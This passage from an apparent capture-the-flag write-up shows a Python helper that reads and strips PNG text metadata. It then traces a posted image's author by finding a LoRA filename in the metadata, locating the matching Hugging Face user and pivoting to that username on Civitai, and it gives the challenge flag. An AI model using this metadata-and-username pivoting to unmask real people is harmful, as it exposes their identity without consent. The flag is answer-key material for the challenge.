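            for m in re.finditer(rf'"{key}"\s*:\s*"([^"]+)"', text):
                hits.setdefault(key, []).append(m.group(1))
    return hits


def strip_text_chunks(png: bytes) -> bytes:
    """Rewrite the PNG without its text chunks: the image is unchanged, the workflow is gone."""
    return PNG_SIGNATURE + b"".join(png_chunk(t, d) for t, d in iter_chunks(png) if t not in TEXT_CHUNKS)


if __name__ == "__main__":
    print("before:", find_model_references(SAMPLE_PNG))
    print("after: ", find_model_references(strip_text_chunks(SAMPLE_PNG)))
```

Pass the bytes of the actual pixel art file to `find_model_references` to get the same two names exiftool showed; `strip_text_chunks` is what the author would have needed to run before posting the image.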


Investigate the base checkpoint

First I look up the base model from the metadata: plantMilkModelSuite_walnut.safetensors

I search for that on Google. The top hit is a Civitai model called: Plant Milk 🌿 - Model Suite - Walnut | Illustrious Checkpoint

This matches the “ckpt_name” in the image metadata almost exactly. So I can confirm the main checkpoint used to generate the image is public on Civitai.

Now I need to follow the LoRA.


Investigate the LoRA

Back in the image metadata I saw: "lora_name": "pixelartmodel_super1337.safetensors"

I search for that. That name brings me to Hugging Face.

The repo is: mrketchup/pixelartmodel_super1337

So:

  • The LoRA is hosted by a user named mrketchup.
  • The repo is named after the LoRA (pixelartmodel_super1337).
  • It’s publicly accessible.

This is the “self-advertise” the challenge text was teasing. The author didn’t openly link their profile, but they accidentally left their LoRA path inside the PNG metadata. That gives me the username: mrketchup.

Now that I have a handle, I can pivot.


Pivot on the username mrketchup

I go back to Civitai and use its search bar to look for that same username.

What I do:

  • Search for mrketchup in the global search.
  • Switch to the “Users” tab in the filters.
  • I get a Civitai account named mrketchup.

So I open their profile.


Check their posted images

On the mrketchup profile, I scroll through their gallery.

I see they’ve posted multiple generated images. That gives me the flag.


🏁 Flag

Terminal window
MetaCTF{GODZILLA_CAT_DOG}